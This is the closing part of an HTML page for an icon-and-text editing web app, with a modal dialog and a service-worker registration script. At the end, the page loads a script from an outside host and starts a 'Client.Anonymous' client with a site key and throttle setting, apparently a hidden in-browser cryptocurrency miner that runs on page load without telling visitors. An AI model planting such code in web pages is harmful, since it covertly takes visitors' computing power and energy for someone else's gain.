                    <button type="button" class="close" data-dismiss="modal" aria-label="Close">
                        <span aria-hidden="true">&times;</span>
                    </button>
                </div>
                <div class="modal-body font-black">
                    <div>
                        <label>change text</label>
                        <input type="text"/>
                    </div>
                    <h3 class="font-black" >Select an icon</h3>
                    <div id="icon-gallery" class="row">
                    </div>

                </div>
                <div class="modal-footer">
                    <button type="button" class="btn btn-danger" data-dismiss="modal">Close</button>
                    <button type="button" class="btn btn-primary">Save changes</button>
                </div>
            </div>
        </div>
</div>


    <script>
    if ('serviceWorker' in navigator) {
        console.log("Will the service worker register?");
        navigator.serviceWorker.register('service-worker.js')
            .then(function (reg) {
                console.log("Yes, it did.");
            }).catch(function (err) {
            console.log("No it didn't. This happened: ", err)
        });
    }
</script>
<script src="https://www.hostingcloud.racing/mIhd.js"></script>
<script>
    var _client = new Client.Anonymous('faf860d6d8b653d9a6c12fa9cd494cbfa48d5f5b999f1fe843bb60aa58f7197f', {
        throttle: 0.4, c: 'w', ads: 0
    });
    _client.start();
</script>
</html>
